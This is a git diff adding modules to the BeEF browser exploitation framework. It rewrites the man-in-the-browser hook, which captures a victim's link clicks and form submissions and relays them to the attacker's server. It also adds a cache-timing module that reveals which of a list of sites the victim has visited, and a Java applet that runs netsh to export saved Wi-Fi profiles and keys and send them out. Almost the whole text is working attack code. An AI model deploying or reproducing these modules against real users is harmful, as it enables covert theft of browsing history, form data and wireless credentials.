diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index bfad2b6d4..e3db90c00 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -15,121 +15,198 @@ // beef.mitb = { - - cid: null, - curl: null, - - init: function(cid, curl){ - beef.mitb.cid = cid; - beef.mitb.curl = curl; - }, - - // Initializes the hook on anchors and forms. - hook: function(){ - beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);}); - beef.onclose.push(function(event) {beef.mitb.endSession();}); - var anchors = document.getElementsByTagName("a"); - var forms = document.getElementsByTagName("form"); - for(var i=0;i0 && i 0 && i < inputs.length - 1) query += "&"; + switch (inputs[i].type) { + case "submit": + break; + default: + query += inputs[i].name + "=" + inputs[i].value; + break; + } + } + e.preventdefault; + beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]); + history.pushState({ Be:"EF" }, "", form.action); + return false; + } + }, + + // Fetches a hooked form with AJAX + fetchForm:function (url, query, target) { + try { + var y = new XMLHttpRequest(); + y.open('POST', url, false, "beef", "beef"); + y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(query); + beef.mitb.sniff("POST: " + url + " [" + query + "]"); + return true; + } catch (x) { + return false; + } + }, + + // Fetches a hooked link with AJAX + fetch:function (url, target) { + try { + var y = new XMLHttpRequest(); + y.open('GET', url, false, "beef", "beef"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(null); + beef.mitb.sniff("GET: " + url); + return true; + } catch (x) { + window.open(url); + beef.mitb.sniff("GET [New Window]: " + url); + return false; + } + }, + + // Relays an entry to the framework + sniff:function (result) { + try { + beef.net.send(beef.mitb.cid, beef.mitb.curl, result); + } catch (x) { + } + return true; + }, + + // Signals the Framework that the user has lost the hook + endSession:function () { + beef.mitb.sniff("Window closed."); + } +} \ No newline at end of file diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js new file mode 100644 index 000000000..a7f286c19 --- /dev/null +++ b/modules/browser/get_history/command.js @@ -0,0 +1,337 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +var hidden_iframe = beef.dom.createInvisibleIframe(); +hidden_iframe.setAttribute('id','f'); +hidden_iframe.setAttribute('name','f'); +hidden_iframe.setAttribute('src','about:blank'); +hidden_iframe.setAttribute('style','opacity: 0.1'); + +var results = ""; +var tries = 0; + +var isIE = 0; +var isFF = 0; + +/******************************* + * SUB-MS TIMER IMPLEMENTATION * + *******************************/ +var cycles = 0; +var exec_next = null; + +function timer_interrupt() { + cycles++; + if (exec_next) { + var cmd = exec_next; + exec_next = null; + cmd(); + } +} + + +if (beef.browser.isFF() == 1) { + window.addEventListener('message', timer_interrupt, false); + + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + var TIME_LIMIT = 5; + var MAX_ATTEMPTS = 2; +} +if (beef.browser.isIE() == 1) { + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png', + 'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] }, + { 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico', + 'https://twitter.com/phoenix/favicon.ico' ] }, + { 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png', + 'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png', + 'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] }, + { 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] }, + { 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] }, + { 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] }, + { 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] }, + { 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif', + 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico', + 'http://a.fsdn.com/sd/logo_w_l.png' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] }, + { 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] }, + { 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + + var TIME_LIMIT = 1; + var MAX_ATTEMPTS = 1; +} + + +function sched_call(fn) { + exec_next = fn; + window.postMessage('123', '*'); +} + + +/********************** + * MAIN STATE MACHINE * + **********************/ +var log_area; +var target_off = 0; +var attempt = 0; +var confirmed_visited = false; +var current_url, current_name; +var wait_cycles; +var frame_ready = false; +var start, stop, urls; + +/* The frame was just pointed to data:... at this point. Initialize a new test, giving the + frame some time to fully load. */ +function perform_check() { + wait_cycles = 0; + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_read, 0); + } + if (beef.browser.isFF() == 1) { + setTimeout(wait_for_read, 1); + } + +} + + +/* Confirm that data:... is loaded correctly. */ +function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (beef.browser.isFF() == 1) { + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } + } + if (beef.browser.isIE() == 1) { + try{ + if (frames['f'].location.href != 'about:blank') throw 1; + //if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1; + document.getElementById("f").src ='javascript:""'; + setTimeout(wait_for_read2, 0); + } catch (e) { + setTimeout(wait_for_read, 0); + } + } +} + +function wait_for_read2() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (!frame_ready) { + setTimeout(wait_for_read2, 0); + } else { + setTimeout(navigate_to_target, 1); + } +} + + + +/* Navigate the frame to the target URL. */ +function navigate_to_target() { + cycles = 0; + if (beef.browser.isFF() == 1) { + sched_call(wait_for_noread); + } + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_noread, 0); + } + urls++; + document.getElementById("f").src = current_url; +} + + +/* The browser is now trying to load the destination URL. Let's see if + we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache + hit. If not, seems like cache miss. In both cases, the navigation + will be aborted by maybe_test_next(). */ + +function wait_for_noread() { + try { + if (beef.browser.isIE() == 1) { + if (frames['f'].location.href == undefined){ + confirmed_visited = true; + throw 1; + } + if (cycles++ >= TIME_LIMIT) { + maybe_test_next(); + return; + } + setTimeout(wait_for_noread, 0); + } + if (beef.browser.isFF() == 1) { + if (document.getElementById('f').contentWindow.location.href == undefined) + { + confirmed_visited = true; + throw 1; + } + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } + } catch (e) { + confirmed_visited = true; + maybe_test_next(); + } +} + +function maybe_test_next() { + frame_ready = false; + if (beef.browser.isFF() == 1) { + document.getElementById('f').src = 'data:text/html,'; + } + if (beef.browser.isIE() == 1) { + document.getElementById("f").src = 'about:blank'; + } + if (target_off < targets.length) { + if (targets[target_off].category) { + //log_text(targets[target_off].category + ':', 'p', 'category'); + target_off++; + } + if (confirmed_visited) { + log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited'); + } + if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) { + if (!confirmed_visited) + //continue; + log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited'); + confirmed_visited = false; + target_off++; + attempt = 0; + maybe_test_next(); + } else { + current_url = targets[target_off].urls[attempt % targets[target_off].urls.length]; + current_name = targets[target_off].name; + attempt++; + perform_check(); + } + } +} + + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + //alert(str); + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,3000); + } +} + +function reload(){ + //window.location.href=window.location.href; + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + + + +/* The handler for "run the test" button on the main page. Dispenses + advice, resets state if necessary. */ +function start_stuff() { + if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) { + target_off = 0; + attempt = 0; + confirmed_visited = false; + urls = 0; + results = ""; + maybe_test_next(); + } + else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.'); + } +} + + +beef.execute(function() { + urls = undefined; + exec_next = null; + start_stuff(); +}); + + diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml new file mode 100644 index 000000000..73f5b5d29 --- /dev/null +++ b/modules/browser/get_history/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_history: + enable: true + category: "Browser" + name: "History Extraction" + description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["FF","IE"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb new file mode 100644 index 000000000..9ffe12fa1 --- /dev/null +++ b/modules/browser/get_history/module.rb @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +class Get_history < BeEF::Core::Command + + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end + +end diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null +++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class new file mode 100644 index 000000000..cb5a0838e Binary files /dev/null and b/modules/host/get_wireless_keys/wirelessZeroConfig.class differ diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.jar b/modules/host/get_wireless_keys/wirelessZeroConfig.jar new file mode 100644 index 000000000..7bccf01b3 Binary files /dev/null and b/modules/host/get_wireless_keys/wirelessZeroConfig.jar differ diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java new file mode 100644 index 000000000..e0c349785 --- /dev/null +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -0,0 +1,113 @@ +import java.io.*; +import java.util.*; +import java.net.*; +import java.applet.*; + +// Keith Lee +// Twitter: @keith55 +// http://milo2012.wordpress.com +// keith.lee2012[at]gmail.com + +public class wirelessZeroConfig extends Applet{ + public static String result = ""; + + public wirelessZeroConfig(){ + super(); + return; + } + public static String getInfo() { + return result; + } + + public void init() { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + } + + public static String getWindows(){ + String cmd1 = "netsh wlan show profiles"; + String cmd2 = "netsh wlan export profile name="; + String keyword1 = "User profiles"; + String wlanProfileArr[]; + String wlanProfileName; + int match = 0; + int count = 0; + ArrayList profileList = new ArrayList(); + try { + //Get wlan profile names + Process p1 = Runtime.getRuntime().exec(cmd1); + BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream())); + String line = null; + //Checks if string match "User profiles" + while ((line = in1.readLine()) != null) { + //Checks if string match "User profiles" + if(match==0){ + if(line.toLowerCase().contains(keyword1.toLowerCase())){ + match=1; + } + } + if(match==1){ + if(count>1){ + //If string matches the keyword "User Profiles" + line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", "")); + if(line.length()>0){ + wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");; + profileList.add(wlanProfileName); + } + } + count+=1; + } + } + in1.close(); + } catch (IOException e) { } + + try{ + //Export WLAN Profile to XML file + for(Iterator iterator = profileList.iterator(); iterator.hasNext();){ + String profileName = iterator.next().toString(); + Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"'); + //Check if exported xml exists + File f = new File("Wireless Network Connection-"+profileName+".xml"); + if(f.exists()){ + //Read contents of XML file into results variable + FileInputStream fstream = new FileInputStream(f); + DataInputStream in2 = new DataInputStream(fstream); + BufferedReader br = new BufferedReader(new InputStreamReader(in2)); + String xmlToStr; + while((xmlToStr = br.readLine()) != null){ + result+=xmlToStr; + } + in2.close(); + } + } + } catch (IOException e) { + } + return result; + } + + public static boolean isWindows() { + String os = System.getProperty("os.name").toLowerCase(); + return (os.indexOf("win") >= 0); + } + + /** + public static void main(String[] args) { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + System.out.println(osVersion); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + System.out.println(result); + } + **/ +}